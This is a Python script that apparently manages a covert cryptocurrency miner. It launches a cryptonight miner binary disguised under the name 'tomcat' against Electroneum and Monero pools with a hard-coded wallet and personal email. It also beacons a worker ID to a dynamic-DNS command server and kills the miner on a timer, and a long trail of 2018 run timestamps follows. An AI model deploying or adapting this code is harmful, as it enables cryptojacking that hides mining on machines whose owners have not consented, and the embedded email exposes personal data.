import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:09:06.979616
#2018-02-17 15:56:04.400662
#2018-02-17 17:44:07.945718
#2018-02-17 19:32:06.348472
#2018-02-17 21:21:05.963760
#2018-02-17 23:05:01.884548
#2018-02-18 00:52:07.040306
#2018-02-18 02:39:06.925886
#2018-02-18 04:27:05.932084
#2018-02-18 06:21:04.092150
#2018-02-18 08:10:07.394491
#2018-02-18 09:58:02.233577
#2018-02-18 11:46:01.851735
#2018-02-18 13:29:06.147778
#2018-02-18 15:19:04.885761
#2018-02-18 17:08:05.012895
#2018-02-18 18:56:01.699069
#2018-02-18 20:43:06.048229
#2018-02-18 22:28:05.011120
#2018-02-19 00:17:04.980835
#2018-02-19 02:03:03.876972
#2018-02-19 03:50:05.346419
#2018-02-19 05:35:04.138360
#2018-02-19 07:23:04.308056
#2018-02-19 09:13:05.687770
#2018-02-19 11:02:01.615543
#2018-02-19 12:48:09.157209
#2018-02-19 14:35:10.244011
#2018-02-19 16:23:05.149248
#2018-02-19 18:11:06.320537
#2018-02-19 19:58:05.064504
#2018-02-19 21:46:06.434986
#2018-02-19 23:32:05.837034
#2018-02-20 01:18:07.237372
#2018-02-20 03:10:04.120656
#2018-02-20 04:56:01.768369
#2018-02-20 06:40:08.046288
#2018-02-20 08:25:05.292574
#2018-02-20 08:26:01.351489
#2018-02-20 10:10:07.330500
#2018-02-20 11:42:05.183507
#2018-02-20 13:18:04.275629
#2018-02-20 14:47:07.784327
#2018-02-20 16:23:08.150486
#2018-02-20 17:58:02.175647
#2018-02-20 19:39:04.268852
#2018-02-20 21:12:04.662128
#2018-02-20 22:43:05.042717
#2018-02-21 00:14:07.006049
#2018-02-21 01:52:05.443494
#2018-02-21 03:28:01.942269
#2018-02-21 05:01:05.814916
#2018-02-21 06:36:01.783238
#2018-02-21 08:10:04.156570
#2018-02-21 09:43:01.876588
#2018-02-21 11:18:09.421666
#2018-02-21 12:49:08.106036
#2018-02-21 14:23:09.159690
#2018-02-21 15:55:04.571099
#2018-02-21 17:35:10.000728
#2018-02-21 19:03:09.624904
#2018-02-21 20:40:06.058041
#2018-02-21 22:18:08.546529
#2018-02-21 23:52:02.012271
#2018-02-22 01:27:05.283536
#2018-02-22 03:02:01.671054
#2018-02-22 04:31:07.429680
#2018-02-22 06:05:08.202400
#2018-02-22 07:41:06.151862
#2018-02-22 09:15:07.490433
#2018-02-22 10:48:11.078875
#2018-02-22 12:21:02.036000
#2018-02-22 13:53:04.509482
#2018-02-22 15:29:07.869754
#2018-02-22 16:58:07.812685
#2018-02-22 18:37:03.683498
#2018-02-22 20:13:08.468983
#2018-02-22 21:43:01.467429
#2018-02-22 23:15:06.409210
#2018-02-23 00:50:02.863168
#2018-02-23 02:24:05.104876
#2018-02-23 03:58:05.535919
#2018-02-23 05:38:06.147221
#2018-02-23 07:23:04.381070
#2018-02-23 09:28:02.124218
#2018-02-23 11:33:07.958177
#2018-02-23 13:24:05.619755
#2018-02-23 15:11:06.517110
#2018-02-23 16:59:05.786341
#2018-02-23 18:48:06.405631
#2018-02-23 20:35:06.078555
#2018-02-23 22:22:07.422474
#2018-02-24 00:08:08.120425
#2018-02-24 01:59:05.118305
#2018-02-24 03:50:07.684087
#2018-02-24 05:39:07.222829
#2018-02-24 07:31:01.775899
#2018-02-24 09:17:01.623523
#2018-02-24 11:12:03.848201
#2018-02-24 13:01:06.194071
#2018-02-24 14:48:04.270039
#2018-02-24 16:40:08.849426
#2018-02-24 18:29:05.122184
#2018-02-24 20:15:06.665409
#2018-02-24 22:06:07.330232
#2018-02-25 01:04:03.655799
#2018-02-25 03:57:04.564059
#2018-02-25 06:41:07.030605
#2018-02-25 11:36:05.058368
#2018-02-25 13:40:01.443554
#2018-02-25 15:14:01.571379